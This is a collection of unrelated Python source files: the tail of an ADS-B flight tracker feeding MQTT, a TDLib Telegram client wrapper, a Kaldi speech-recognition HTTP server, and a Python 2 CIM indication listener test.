logging.critical("Socket Error")
self.dump1090Close()
return None
buffer = buffer.decode("utf-8")
buffering = True
if buffer == "":
logging.critical("Buffer Empty")
self.dump1090Close()
return None
while buffering:
if "\n" in buffer:
(line, buffer) = buffer.split("\r\n", 1)
yield line
else:
try:
more = self.__dump1090_sock.recv(4096)
except ConnectionResetError:
logging.critical("Connection Reset Error")
self.dump1090Close()
return None
except socket.error:
logging.critical("Socket Error")
self.dump1090Close()
return None
if not more:
buffering = False
else:
if not isinstance(more, str):
more = more.decode("utf-8")
if more == "":
logging.critical("Receive Empty")
self.dump1090Close()
return None
buffer += more
if buffer:
yield buffer
except socket.timeout:
return None
def run(self):
"""Run the flight tracker.
"""
global aircraft_pinned
print("connecting to MQTT broker at "+ self.__mqtt_broker +", subcribing on channel '"+ self.__plane_topic+"'publising on: " + self.__flight_topic)
self.__client = mqtt.Client("skyscan-tracker-" + ID) #create new instance
self.__client.on_message = on_message #attach function to callback
print("setup MQTT")
self.__client.connect(self.__mqtt_broker) #connect to broker
print("connected mqtt")
self.__client.loop_start() #start the loop
print("start MQTT")
self.__client.subscribe("skyscan/egi")
self.__client.subscribe(config_topic)
self.__client.publish("skyscan/registration", "skyscan-tracker-"+ID+" Registration", 0, False)
print("subscribe mqtt")
threading.Thread(target = self.__publish_thread, daemon = True).start()
# This loop reads in new messages from dump1090 and determines which plane to track
while True:
if not self.dump1090Connect():
continue
for data in self.dump1090Read():
if data is None:
continue
self.cleanObservations()
m = sbs1.parse(data)
if m:
icao24 = m["icao24"].lower()
# Add or update the Observation for the plane
if icao24 not in self.__observations:
self.__observations[icao24] = Observation(m)
else:
self.__observations[icao24].update(m)
if bool(aircraft_pinned) & (aircraft_pinned not in self.__observations):
aircraft_pinned = None
# if the pinned_aircraft variable is set and that the plane is the pinned aircraft
if (bool(aircraft_pinned)) & (icao24 == aircraft_pinned):
if aircraft_pinned != self.__tracking_icao24:
self.__tracking_icao24 = icao24
self.__updateTrackingDistance()
logging.info("{}\t[PINNED AIRCRAFT TRACKING]\tDist: {}\tElev: {}\t\t".format(self.__tracking_icao24, self.__tracking_distance, self.__observations[icao24].getElevation()))
else:
self.__updateTrackingDistance()
# if the plane is suitable to be tracked
                    elif not aircraft_pinned and self.__isTrackable(self.__observations[icao24]):
# if no plane is being tracked, track this one
if not self.__tracking_icao24:
self.__tracking_icao24 = icao24
self.__updateTrackingDistance()
logging.info("{}\t[TRACKING]\tDist: {}\tElev: {}\t\t".format(self.__tracking_icao24, self.__tracking_distance, self.__observations[icao24].getElevation()))
# if this is the plane being tracked, update the tracking distance
elif self.__tracking_icao24 == icao24:
self.__updateTrackingDistance()
# This plane is trackable, but is not the one being tracked
else:
distance = self.__observations[icao24].getDistance()
if distance < self.__tracking_distance:
self.__tracking_icao24 = icao24
self.__tracking_distance = distance
logging.info("{}\t[TRACKING]\tDist: {}\tElev: {}\t\t - Switched to closer plane".format(self.__tracking_icao24, int(self.__tracking_distance), int(self.__observations[icao24].getElevation())))
else:
# If the plane is currently being tracked, but is no longer trackable:
if self.__tracking_icao24 == icao24:
logging.info("%s\t[NOT TRACKING]\t - Observation is no longer trackable" % (icao24))
logging.info(self.__whyTrackable(self.__observations[icao24]))
self.__tracking_icao24 = None
self.__tracking_distance = 999999999
time.sleep(0.01)
def selectNearestObservation(self):
"""Select nearest presentable aircraft
"""
self.__tracking_icao24 = None
self.__tracking_distance = 999999999
for icao24 in self.__observations:
if not self.__isTrackable(self.__observations[icao24]):
continue
distance = self.__observations[icao24].getDistance()
if self.__observations[icao24].getDistance() < self.__tracking_distance:
self.__tracking_icao24 = icao24
self.__tracking_distance = distance
if self.__tracking_icao24:
logging.info("{}\t[TRACKING]\tDist: {}\t\t - Selected Nearest Observation".format(self.__tracking_icao24, self.__tracking_distance))
    def cleanObservations(self):
        """Clean out observations for planes not seen in a while"""
        global aircraft_pinned
now = datetime.utcnow()
if now > self.__next_clean:
cleaned = []
for icao24 in self.__observations:
# logging.info("[%s] %s -> %s : %s" % (icao24, self.__observations[icao24].getLoggedDate(), self.__observations[icao24].getLoggedDate() + timedelta(seconds=OBSERVATION_CLEAN_INTERVAL), now))
if self.__observations[icao24].getLoggedDate() + timedelta(seconds=OBSERVATION_CLEAN_INTERVAL) < now:
logging.info("%s\t[REMOVED]\t" % (icao24))
if icao24 == aircraft_pinned:
aircraft_pinned = None
logging.info("%s\t[REMOVED PINNED AIRCRAFT - REVERTING TO NORMAL TRACKING]\t" % (icao24))
if icao24 == self.__tracking_icao24:
self.__tracking_icao24 = None
self.__tracking_distance = 999999999
cleaned.append(icao24)
if icao24 == self.__tracking_icao24 and not self.__isTrackable(self.__observations[icao24]) and not aircraft_pinned:
logging.info("%s\t[NOT TRACKING]\t - Observation is no longer trackable" % (icao24))
logging.info(self.__whyTrackable(self.__observations[icao24]))
self.__tracking_icao24 = None
self.__tracking_distance = 999999999
for icao24 in cleaned:
del self.__observations[icao24]
if self.__tracking_icao24 is None:
self.selectNearestObservation()
self.__next_clean = now + timedelta(seconds=OBSERVATION_CLEAN_INTERVAL)
def getConfig():
config ={}
config["camera_altitude"] = camera_altitude
config["camera_latitude"] = camera_latitude
config["camera_longitude"] = camera_longitude
config["camera_lead"] = camera_lead
config["min_elevation"] = min_elevation
config["min_distance"] = min_distance
config["max_distance"] = max_distance
config["min_altitude"] = min_altitude
config["max_altitude"] = max_altitude
config["aircraft_pinned"] = aircraft_pinned
return config
@app.route('/')
def index():
return render_template('index.html', title='SkyScan', tracking=tracker.getTracking(), observations=tracker.getObservations(), config=getConfig())
def main():
global args
global logging
global camera_altitude
global camera_latitude
global camera_longitude
global camera_lead
global plane_topic
global min_elevation
global planes
global tracker
parser = argparse.ArgumentParser(description='A Dump 1090 to MQTT bridge')
parser.add_argument('-l', '--lat', type=float, help="Latitude of camera")
parser.add_argument('-L', '--lon', type=float, help="Longitude of camera")
parser.add_argument('-a', '--alt', type=float, help="altitude of camera in METERS!", default=0)
parser.add_argument('-c', '--camera-lead', type=float, help="how many seconds ahead of a plane's predicted location should the camera be positioned", default=0.25)
parser.add_argument('-M', '--min-elevation', type=int, help="minimum elevation for camera", default=0)
parser.add_argument('-m', '--mqtt-host', help="MQTT broker hostname", default='127.0.0.1')
parser.add_argument('-p', '--mqtt-port', type=int, help="MQTT broker port number (default 1883)", default=1883)
parser.add_argument('-P', '--plane-topic', dest='plane_topic', help="MQTT plane topic", default="skyscan/planes/json")
parser.add_argument('-T', '--flight-topic', dest='flight_topic', help="MQTT flight tracking topic", default="skyscan/flight/json")
parser.add_argument('-v', '--verbose', action="store_true", help="Verbose output")
parser.add_argument('-H', '--dump1090-host', help="dump1090 hostname", default='127.0.0.1')
parser.add_argument('--dump1090-port', type=int, help="dump1090 port number (default 30003)", default=30003)
args = parser.parse_args()
    if args.lat is None or args.lon is None:
logging.critical("You really need to tell me where you are located (--lat and --lon)")
sys.exit(1)
camera_longitude = args.lon
camera_latitude = args.lat
camera_altitude = args.alt # Altitude is in METERS
plane_topic = args.plane_topic
camera_lead = args.camera_lead
min_elevation = args.min_elevation
    level = logging.DEBUG if args.verbose else logging.INFO
    styles = {'critical': {'bold': True, 'color': 'red'}, 'debug': {'color': 'green'}, 'error': {'color': 'red'}, 'info': {'color': 'white'}, 'notice': {'color': 'magenta'}, 'spam': {'color': 'green', 'faint': True}, 'success': {'bold': True, 'color': 'green'}, 'verbose': {'color': 'blue'}, 'warning': {'color': 'yellow'}}
    show_process_name = False  # flip to True to include the process name in log lines
    if not show_process_name:
coloredlogs.install(level=level, fmt='%(asctime)s.%(msecs)03d \033[0;90m%(levelname)-8s '
''
'\033[0;36m%(filename)-18s%(lineno)3d\033[00m '
'%(message)s',
level_styles = styles)
else:
# Show process name
coloredlogs.install(level=level, fmt='%(asctime)s.%(msecs)03d \033[0;90m%(levelname)-8s '
'\033[0;90m[\033[00m \033[0;35m%(processName)-15s\033[00m\033[0;90m]\033[00m '
'\033[0;36m%(filename)s:%(lineno)d\033[00m '
'%(message)s')
logging.info("---[ Starting %s ]---------------------------------------------" % sys.argv[0])
planes = pd.read_csv("/data/aircraftDatabase.csv") #,index_col='icao24')
logging.info("Printing table")
logging.info(planes)
threading.Thread(target=app.run, kwargs={"host": '0.0.0.0', "port": 5000}).start()
tracker = FlightTracker(args.dump1090_host, args.mqtt_host, args.plane_topic, args.flight_topic,dump1090_port = args.dump1090_port, mqtt_port = args.mqtt_port)
tracker.run() # Never returns
# Ye ol main
if __name__ == "__main__":
try:
main()
except Exception as e:
logging.critical(e, exc_info=True)
|
client.py | import os
import time
import queue
import signal
import typing
import getpass
import logging
import threading
import json
from typing import Any, Dict, List, Type, Callable, Optional, DefaultDict
from collections import defaultdict
from pytglib import VERSION
from pytglib.utils import AsyncResult
from pytglib.tdjson import TDJson
from pytglib.worker import BaseWorker, SimpleWorker
from pytglib.api import Object
from pytglib.functions import Function
logger = logging.getLogger(__name__)
MESSAGE_HANDLER_TYPE: str = 'updateNewMessage'
RAW_UPDATE_HANDLER_TYPE: str = 'update'
DELETE_MESSAGES_HANDLER_TYPE: str = 'updateDeleteMessages'
class Telegram:
def __init__(
self,
library_path,
api_id: int,
api_hash: str,
database_encryption_key: str,
phone: str = None,
bot_token: str = None,
worker: Optional[Type[BaseWorker]] = None,
files_directory: str = None,
use_test_dc: bool = False,
use_message_database: bool = True,
device_model: str = 'python-telegram',
application_version: str = VERSION,
system_version: str = 'unknown',
system_language_code: str = 'en',
login: bool = False,
default_workers_queue_size=1000,
tdlib_verbosity: int = 2,
) -> None:
"""
Args:
            api_id - ID of your app (https://my.telegram.org/apps/)
            api_hash - api_hash of your app (https://my.telegram.org/apps/)
phone - your phone number
library_path - you can change path to the compiled libtdjson library
worker - worker to process updates
files_directory - directory for the tdlib's files (database, images, etc.)
use_test_dc - use test datacenter
use_message_database
device_model
application_version
system_version
system_language_code
"""
self.api_id = api_id
self.api_hash = api_hash
self.library_path = library_path
self.phone = phone
self.bot_token = bot_token
self.use_test_dc = use_test_dc
self.device_model = device_model
self.system_version = system_version
self.system_language_code = system_language_code
self.application_version = application_version
self.use_message_database = use_message_database
self._queue_put_timeout = 10
if not self.bot_token and not self.phone:
raise ValueError('You must provide bot_token or phone')
self._database_encryption_key = database_encryption_key
if not files_directory:
files_directory = f'/tmp/.tdlib_files/{self.phone}/'
self.files_directory = files_directory
self._authorized = False
self._is_enabled = False
# todo: move to worker
self._workers_queue: queue.Queue = queue.Queue(
maxsize=default_workers_queue_size
)
if not worker:
worker = SimpleWorker
self.worker = worker(queue=self._workers_queue)
self._results: Dict[str, AsyncResult] = {}
self._update_handlers: DefaultDict[str, List[Callable]] = defaultdict(list)
self._tdjson = TDJson(library_path=library_path, verbosity=tdlib_verbosity)
self._run()
self.functions = Function(self)
if login:
self.login()
def __del__(self):
self.stop()
def stop(self) -> None:
"""Stops the client"""
self._is_enabled = False
if hasattr(self, '_tdjson'):
self._tdjson.stop()
def call_method(self, method_name: str, params: Optional[Dict[str, Any]] = None):
data = {'@type': method_name}
if params:
data.update(params)
return self._send_data(data)
def _run(self):
self._is_enabled = True
self._td_listener = threading.Thread(target=self._listen_to_td)
self._td_listener.daemon = True
self._td_listener.start()
self.worker.run()
def _listen_to_td(self):
logger.info('[pytglib.td_listener] started')
while self._is_enabled:
update = self._tdjson.receive()
if update:
self._update_async_result(update)
self._run_handlers(update)
def _update_async_result(self, update: dict) -> typing.Optional[AsyncResult]:
async_result = None
_special_types = (
'updateAuthorizationState',
) # for authorizationProcess @extra.request_id doesn't work
if update.get('@type') in _special_types:
request_id = update['@type']
else:
request_id = update.get('@extra', {}).get('request_id')
if not request_id:
logger.debug('request_id has not been found in the update')
else:
async_result = self._results.get(request_id)
if not async_result:
                logger.debug(
                    'async_result has not been found by request_id=%s', request_id
                )
else:
async_result.parse_update(update)
self._results.pop(request_id, None)
return async_result
def _run_handlers(self, update: Dict[Any, Any]) -> None:
update_type: str = update.get('@type', 'unknown')
for handler in self._update_handlers[update_type]:
self._workers_queue.put((handler, update), timeout=self._queue_put_timeout)
for handler in self._update_handlers[RAW_UPDATE_HANDLER_TYPE]:
self._workers_queue.put((handler, update), timeout=self._queue_put_timeout)
def add_message_handler(self, func: Callable) -> None:
"""
Adds function to handle all incoming messages
Args:
func (:obj:`Callable`):
Message handler function
"""
self.add_update_handler(MESSAGE_HANDLER_TYPE, func)
def add_raw_update_handler(self, func: Callable) -> None:
"""
Adds function to handle all incoming updates
Args:
func (:obj:`Callable`):
Update handler function
"""
self.add_update_handler(RAW_UPDATE_HANDLER_TYPE, func)
def add_delete_messages_handler(self, func: Callable) -> None:
"""
Adds function to handle deleted messages
Args:
func (:obj:`Callable`):
Deleted messages handler function
"""
self.add_update_handler(DELETE_MESSAGES_HANDLER_TYPE, func)
def add_update_handler(self, handler_type: str, func: Callable) -> None:
"""
Adds function to handle custom type of updates
Args:
handler_type (:obj:`str`):
Update type name
For example updateNewMessage
func (:obj:`Callable`):
Handler function
"""
if func not in self._update_handlers[handler_type]:
self._update_handlers[handler_type].append(func)
def _send_data(self, data: dict, result_id: str = None) -> AsyncResult:
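        # tdlib echoes the '@extra' field back verbatim in its response;
        # stashing the AsyncResult id there is how responses are matched to requests.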
if '@extra' not in data:
data['@extra'] = {}
if not result_id and 'request_id' in data['@extra']:
result_id = data['@extra']['request_id']
async_result = AsyncResult(client=self, result_id=result_id)
data['@extra']['request_id'] = async_result.id
self._tdjson.send(data)
self._results[async_result.id] = async_result
async_result.request = data
return async_result
    def send(self, data: Object, result_id: str = None) -> AsyncResult:
        # Serialize the pytglib Object, then reuse _send_data rather than duplicating its logic.
        data = json.loads(str(data))
        return self._send_data(data, result_id=result_id)
def execute(self, data: Object) -> Object:
data = json.loads(str(data))
result = self._tdjson.td_execute(data)
return Object.read(result)
def idle(self, stop_signals=(signal.SIGINT, signal.SIGTERM, signal.SIGABRT)):
"""Blocks until one of the signals are received and stops"""
# for sig in stop_signals:
# signal.signal(sig, self._signal_handler)
self._is_enabled = True
while self._is_enabled:
time.sleep(0.1)
def _signal_handler(self, signum, frame):
self._is_enabled = False
def login(self):
"""
Login process (blocking)
Must be called before any other call. It sends initial params to the tdlib, sets database encryption key, etc.
"""
authorization_state = None
actions = {
None: self._send_encryption_key,
'authorizationStateWaitTdlibParameters': self._set_initial_params,
'authorizationStateWaitEncryptionKey': self._send_encryption_key,
'authorizationStateWaitPhoneNumber': self._send_phone_number_or_bot_token,
'authorizationStateWaitCode': self._send_telegram_code,
'authorizationStateWaitPassword': self._send_password,
'authorizationStateReady': self._complete_authorization,
}
if self.phone:
logger.info('[login] Login process has been started with phone')
else:
logger.info('[login] Login process has been started with bot token')
while not self._authorized:
logger.info('[login] current authorization state: %s', authorization_state)
result = actions[authorization_state]()
if result:
result.wait(raise_exc=False)
res = result.update
if not res:
# print(result.error_info)
if result.error_info['message'] == 'Database encryption key is needed:' \
' call checkDatabaseEncryptionKey first':
authorization_state = 'authorizationStateWaitEncryptionKey'
elif result.error_info['message'] == 'Initialization parameters are needed:' \
' call setTdlibParameters first':
authorization_state = 'authorizationStateWaitTdlibParameters'
else:
raise ValueError(str(result.error_info)) # TODO: Change to "Error" object
else:
authorization_state = res.authorization_state.ID
def _set_initial_params(self) -> AsyncResult:
logger.info(
'Setting tdlib initial params: files_dir=%s, test_dc=%s',
self.files_directory,
self.use_test_dc,
)
data = {
# todo: params
'@type': 'setTdlibParameters',
'parameters': {
'use_test_dc': self.use_test_dc,
'api_id': self.api_id,
'api_hash': self.api_hash,
'device_model': self.device_model,
'system_version': self.system_version,
'application_version': self.application_version,
'system_language_code': self.system_language_code,
'database_directory': os.path.join(self.files_directory, 'database'),
'use_message_database': self.use_message_database,
'files_directory': os.path.join(self.files_directory, 'files'),
},
}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_encryption_key(self) -> AsyncResult:
logger.info('Sending encryption key')
data = {
'@type': 'checkDatabaseEncryptionKey',
'encryption_key': self._database_encryption_key,
}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_phone_number_or_bot_token(self) -> AsyncResult:
"""Sends phone number or a bot_token"""
if self.phone:
return self._send_phone_number()
elif self.bot_token:
return self._send_bot_token()
else:
raise RuntimeError('Unknown mode: both bot_token and phone are None')
def _send_phone_number(self) -> AsyncResult:
logger.info('Sending phone number')
data = {
'@type': 'setAuthenticationPhoneNumber',
'phone_number': self.phone,
'allow_flash_call': False,
'is_current_phone_number': True,
}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_bot_token(self) -> AsyncResult:
logger.info('Sending bot token')
data = {'@type': 'checkAuthenticationBotToken', 'token': self.bot_token}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_telegram_code(self) -> AsyncResult:
logger.info('Sending code')
code = input('Enter code:')
data = {'@type': 'checkAuthenticationCode', 'code': str(code)}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_password(self) -> AsyncResult:
logger.info('Sending password')
password = getpass.getpass('Password:')
data = {'@type': 'checkAuthenticationPassword', 'password': password}
return self._send_data(data, result_id='updateAuthorizationState')
def _complete_authorization(self) -> None:
logger.info('Completing auth process')
self._authorized = True
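# A minimal usage sketch (api_id, api_hash and phone below are placeholders;
# a compiled libtdjson and valid credentials are assumed):
#
#   tg = Telegram(library_path='libtdjson.so', api_id=12345, api_hash='abc123',
#                 phone='+10000000000', database_encryption_key='changeme')
#   tg.login()
#   result = tg.call_method('getMe')
#   result.wait()
#   print(result.update)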
|
asr_server.py | #by marvin 2021.03.09
# simple speech recognition http api server
#
# WARNING:
# right now, this supports a single client only - needs a lot more work
# to become (at least somewhat) scalable
#
# Decode WAV Data
# ---------------
#
# * POST `/decode`
# * args (JSON encoded dict):
# * "audio" : array of signed int16 samples
# * "do_record" : boolean, if true record to wav file on disk
# * "do_asr" : boolean, if true start/continue kaldi ASR
# * "do_finalize" : boolean, if true finish kaldi ASR, return decoded string
#
# Returns:
#
# * 400 if request is invalid
# * 200 OK
# * 201 OK {"hstr": "hello world", "confidence": 0.02, "audiofn": "data/recordings/anonymous-20170105-rec/wav/de5-005.wav"}
#
# Example:
#
# curl -i -H "Content-Type: application/json" -X POST \
# -d '{"audio": [1,2,3,4], "do_record": true, "do_asr": true, "do_finalize": true}' \
# http://localhost:8301/decode
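#
# For reference, an equivalent Python client (sketch; assumes the `requests`
# package and a server running on localhost:8301):
#
#   import requests
#   reply = requests.post('http://localhost:8301/decode',
#                         json={'audio': [1, 2, 3, 4], 'do_record': True,
#                               'do_asr': True, 'do_finalize': True})
#   print(reply.json()['hstr'])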
import os
import sys
import logging
import traceback
import json
import datetime
import wave
import errno
import struct
from time import time
from optparse import OptionParser
from setproctitle import setproctitle
#from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from http.server import BaseHTTPRequestHandler,HTTPServer
sys.path.append(r'/wmh/py-kaldi-asr/kaldiasr')
from nnet3 import KaldiNNet3OnlineModel, KaldiNNet3OnlineDecoder
import numpy as np
#multi process
import multiprocessing
DEFAULT_HOST = 'localhost'
DEFAULT_PORT = 8001
NUM_WORKER = 5
DEFAULT_MODEL_DIR = 'data/models/kaldi-dianhua-cn-8k-2700h-tdnnf-baseline'
#DEFAULT_MODEL_DIR = 'data/models/kaldi-generic-cn-16k-1wh-tdnnf-fun9_v1'
#DEFAULT_MODEL_DIR = 'data/models/kaldi-generic-en-16k-1200h-tdnnf-r20190609'
DEFAULT_MODEL = 'model'
DEFAULT_VF_LOGIN = 'anonymous'
DEFAULT_REC_DIR = 'data/recordings'
SAMPLE_RATE = 8000
PROC_TITLE = 'asr_server'
audiofn = '' # path to current wav file being written
wf = None  # current wav file being written
class SpeechHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_error(400, 'Invalid request')
def do_HEAD(self):
self._set_headers()
def do_POST(self):
global wf, decoder, vf_login, recordings_dir, audiofn
print('server process id:', os.getpid())
logging.debug("POST %s" % self.path)
if self.path=="/decode":
data = json.loads(self.rfile.read(int(self.headers['content-length'])))
#print(data)
audio = data['audio']
do_record = data['do_record']
do_asr = data['do_asr']
do_finalize = data['do_finalize']
hstr = ''
confidence = 0.0
# FIXME: remove audio = map(lambda x: int(x), audios.split(','))
if do_record:
# store recording in WAV format
if not wf:
ds = datetime.date.strftime(datetime.date.today(), '%Y%m%d')
audiodirfn = '%s/%s-%s-rec/wav' % (recordings_dir, vf_login, ds)
logging.debug('audiodirfn: %s' % audiodirfn)
                    os.makedirs(audiodirfn, exist_ok=True)  # create the recording directory tree if needed
cnt = 0
while True:
cnt += 1
audiofn = '%s/de5-%03d.wav' % (audiodirfn, cnt)
if not os.path.isfile(audiofn):
break
logging.debug('audiofn: %s' % audiofn)
# create wav file
wf = wave.open(audiofn, 'wb')
wf.setnchannels(1)
wf.setsampwidth(2)
wf.setframerate(SAMPLE_RATE)
packed_audio = struct.pack('%sh' % len(audio), *audio)
wf.writeframes(packed_audio)
if do_finalize:
wf.close()
wf = None
else:
audiofn = ''
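            # Streaming decode: audio chunks are fed to the kaldi decoder as
            # they arrive; do_finalize flushes the decoder so the decoded
            # string and a confidence score become available below.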
if do_asr:
decoder.decode(SAMPLE_RATE, np.array(audio, dtype=np.float32), do_finalize)
if do_finalize:
hstr, confidence = decoder.get_decoded_string()
logging.info ( "** confidence: %9.5f , result: %s" % (confidence, hstr))
logging.debug ( "*****************************************************************************")
logging.debug ( "**")
logging.debug ( "** %9.5f %s" % (confidence, hstr))
logging.debug ( "**")
logging.debug ( "*****************************************************************************")
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
reply = {'hstr': hstr, 'confidence': confidence, 'audiofn': audiofn}
self.wfile.write(json.dumps(reply).encode())
return
#ForkingMixIn, ThreadingMixIn
if __name__ == '__main__':
setproctitle (PROC_TITLE)
#
# commandline
#
parser = OptionParser("usage: %prog [options] ")
parser.add_option ("-v", "--verbose", action="store_true", dest="verbose",
help="verbose output")
parser.add_option ("-H", "--host", dest="host", type = "string", default=DEFAULT_HOST,
help="host, default: %s" % DEFAULT_HOST)
parser.add_option ("-p", "--port", dest="port", type = "int", default=DEFAULT_PORT,
help="port, default: %d" % DEFAULT_PORT)
parser.add_option ("-d", "--model-dir", dest="model_dir", type = "string", default=DEFAULT_MODEL_DIR,
help="kaldi model directory, default: %s" % DEFAULT_MODEL_DIR)
parser.add_option ("-m", "--model", dest="model", type = "string", default=DEFAULT_MODEL,
help="kaldi model, default: %s" % DEFAULT_MODEL)
parser.add_option ("-r", "--recordings-dir", dest="recordings_dir", type = "string", default=DEFAULT_REC_DIR,
help="wav recordings directory, default: %s" % DEFAULT_REC_DIR)
parser.add_option ("-l", "--voxforge-login", dest="vf_login", type = "string", default=DEFAULT_VF_LOGIN,
help="voxforge login (used in recording filename generation), default: %s" % DEFAULT_VF_LOGIN)
(options, args) = parser.parse_args()
if options.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
kaldi_model_dir = options.model_dir
kaldi_model = options.model
vf_login = options.vf_login
recordings_dir = options.recordings_dir
#
# setup kaldi decoder
#
start_time = time()
logging.info('%s loading model from %s ...' % (kaldi_model, kaldi_model_dir))
nnet3_model = KaldiNNet3OnlineModel (kaldi_model_dir, kaldi_model)
logging.info('%s loading model... done. took %fs.' % (kaldi_model, time()-start_time))
decoder = KaldiNNet3OnlineDecoder (nnet3_model)
#
# run HTTP server
#
try:
print('main process id:', os.getpid())
i=0
while i < NUM_WOKER :
port=int(options.port)+i
print(port)
server = HTTPServer((options.host, port), SpeechHandler)
p=multiprocessing.Process(target=server.serve_forever)
            logging.info('listening for HTTP requests on %s:%d' % (options.host, port))
#server.serve_forever()
p.start()
i=i+1
print("total "+str(NUM_WOKER)+" ports start, form port id "+str(DEFAULT_PORT))
except KeyboardInterrupt:
logging.error('^C received, shutting down the web server')
server.socket.close()
|
TestIndications.py | #!/usr/bin/python
#
# Simple indication receiver using Twisted Python. HTTP POST requests
# are listened for on port 5309 (the _port value below); no SSL listener is
# configured even though ssl is imported.
#
# Requires Twisted Python and pywbem.
#
import sys
import optparse
from twisted.internet import reactor, ssl
from twisted.web import server, resource
import pywbem
import threading
from socket import getfqdn
from twisted.python import log
import time
from lib import wbem_connection
_interop_ns = None
_port = 5309
_num_to_send = pywbem.Uint16(42)
class CIMListener(resource.Resource):
""" CIM Listener
"""
isLeaf = 1
def __init__(self, callback, http_port=5988):
self.callback = callback
self.http_port = http_port
site = server.Site(self)
reactor.listenTCP(self.http_port, site)
def stop(self):
reactor.stop()
def run(self):
reactor.run()
def render_POST(self, request):
tt = pywbem.parse_cim(pywbem.xml_to_tupletree(request.content.read()))
insts = [x[1] for x in tt[2][2][0][2][2]]
for inst in insts:
self.callback(inst)
        return b''  # Twisted requires bytes from render_POST under Python 3
def createFilter( ch, query='select * from CIM_ProcessIndication',
ns=_interop_ns,
querylang='WQL',
src_ns='root/cimv2',
in_name=None):
name = in_name or 'cimfilter%s'%time.time()
filterinst=pywbem.CIMInstance('CIM_IndicationFilter')
filterinst['CreationClassName']='CIM_IndicationFilter'
filterinst['SystemCreationClassName']='CIM_ComputerSystem'
filterinst['SystemName']=getfqdn()
filterinst['Name']=name
filterinst['Query']=query
filterinst['QueryLanguage']=querylang
filterinst['SourceNamespace']=src_ns
cop = pywbem.CIMInstanceName('CIM_IndicationFilter')
cop.keybindings = { 'CreationClassName':'CIM_IndicationFilter',
'SystemClassName':'CIM_ComputerSystem',
'SystemName':getfqdn(),
'Name':name }
cop.namespace=ns
filterinst.path = cop
filtercop = ch.CreateInstance(filterinst)
return filtercop
def deleteAllSubs(ch, destination='http://localhost:%s' % _port,
ns=_interop_ns):
subs = ch.EnumerateInstanceNames('CIM_IndicationSubscription',
namespace=ns)
num = 0
for sub in subs:
handler_name = sub['Handler']
try:
handler = ch.GetInstance(handler_name, PropertyList=['Destination'])
        except pywbem.CIMError as args:
            print("** Error fetching handler instance: %s %s" %
                  (handler_name, args))
continue
if handler['Destination'] == destination:
deleteSubscription(ch, sub)
num+= 1
if num > 0:
print '** deleted %d subscriptions' % num
def createDest( ch, destination='http://localhost:%s' % _port,
ns=_interop_ns,
in_name=None):
name = in_name or 'cimlistener%s'%time.time()
destinst=pywbem.CIMInstance('CIM_ListenerDestinationCIMXML')
destinst['CreationClassName']='CIM_ListenerDestinationCIMXML'
destinst['SystemCreationClassName']='CIM_ComputerSystem'
destinst['SystemName']=getfqdn()
destinst['Name']=name
destinst['Destination']=destination
cop = pywbem.CIMInstanceName('CIM_ListenerDestinationCIMXML')
cop.keybindings = { 'CreationClassName':'CIM_ListenerDestinationCIMXML',
'SystemCreationClassName':'CIM_ComputerSystem',
'SystemName':getfqdn(),
'Name':name }
cop.namespace=ns
destinst.path = cop
destcop = ch.CreateInstance(destinst)
return destcop
def createSubscription(ch, ns=_interop_ns):
replace_ns = ch.default_namespace
ch.default_namespace=ns
indfilter=createFilter(ch, ns=ns)
indhandler=createDest(ch, ns=ns)
subinst=pywbem.CIMInstance('CIM_IndicationSubscription')
subinst['Filter']=indfilter
subinst['Handler']=indhandler
cop = pywbem.CIMInstanceName('CIM_IndicationSubscription')
cop.keybindings = { 'Filter':indfilter,
'Handler':indhandler }
cop.namespace=ns
subinst.path = cop
subcop = ch.CreateInstance(subinst)
ch.default_namespace=replace_ns
return subcop
def deleteSubscription(ch, subcop):
indfilter = subcop['Filter']
indhandler= subcop['Handler']
ch.DeleteInstance(subcop)
ch.DeleteInstance(indfilter)
ch.DeleteInstance(indhandler)
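# Illustrative sketch (not called by this test): the minimal round trip the
# helpers above support -- create filter, destination and subscription, then
# tear all three down again.
def exampleSubscribeRoundtrip(ch, ns):
subcop = createSubscription(ch, ns=ns)
deleteSubscription(ch, subcop)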
# end indication support methods
#log.startLogging(sys.stdout)
_lock = threading.RLock()
_shutdown = False
_insts_received = 0
if __name__ == '__main__':
parser = optparse.OptionParser()
wbem_connection.getWBEMConnParserOptions(parser)
parser.add_option('--verbose', '', action='store_true', default=False,
help='Show verbose output')
parser.add_option('--level',
'-l',
action='store',
type='int',
dest='dbglevel',
help='Indicate the level of debugging statements to display (default=2)',
default=2)
_g_opts, _g_args = parser.parse_args()
conn = wbem_connection.WBEMConnFromOptions(parser)
nss = ['root/interop', 'root/cimv2']
for ns in nss:
try:
conn.GetClass('CIM_IndicationSubscription', namespace=ns)
_interop_ns = ns
break
except pywbem.CIMError, arg:
if arg[0] in [pywbem.CIM_ERR_INVALID_CLASS,
pywbem.CIM_ERR_INVALID_NAMESPACE]:
continue
raise
else:
print 'Unable to find class CIM_IndicationSubscription in namespaces',\
nss
sys.exit(1)
def cb(inst):
global _lock
global _shutdown
global _insts_received
global _num_to_send
sys.stdout.write('.'); sys.stdout.flush()
_lock.acquire()
_insts_received+= 1
if _num_to_send == _insts_received:
_shutdown = True
_lock.release()
cl = CIMListener(callback=cb, http_port=_port)
deleteAllSubs(conn, ns=_interop_ns)
def threadfunc():
try:
time.sleep(1)
numrcv = 0
subcop = createSubscription(conn, ns=_interop_ns)
time.sleep(1)
conn.InvokeMethod('reset_indication_count', 'Test_UpcallAtom')
print 'Waiting for %s indications...' % _num_to_send
countsent,outs = conn.InvokeMethod('send_indications',
'Test_UpcallAtom', num_to_send=_num_to_send)
numsent,outs = conn.InvokeMethod('get_indication_send_count',
'Test_UpcallAtom')
deleteSubscription(conn, subcop)
if (countsent != numsent):
print("\nsend_indications NumSent(%d) doesn't match get_indication_send_count NumSent(%d)\n" % (countsent, numsent))
sys.exit(1)
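# Poll for up to ~10 seconds (20 x 0.5s) for the callback to flag
# completion, then stop the reactor.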
for i in xrange(20):
_lock.acquire()
if _shutdown:
reactor.stop()
_lock.release()
if not reactor.running:
break
time.sleep(.5)
if reactor.running:
reactor.stop()
except:
if reactor.running:
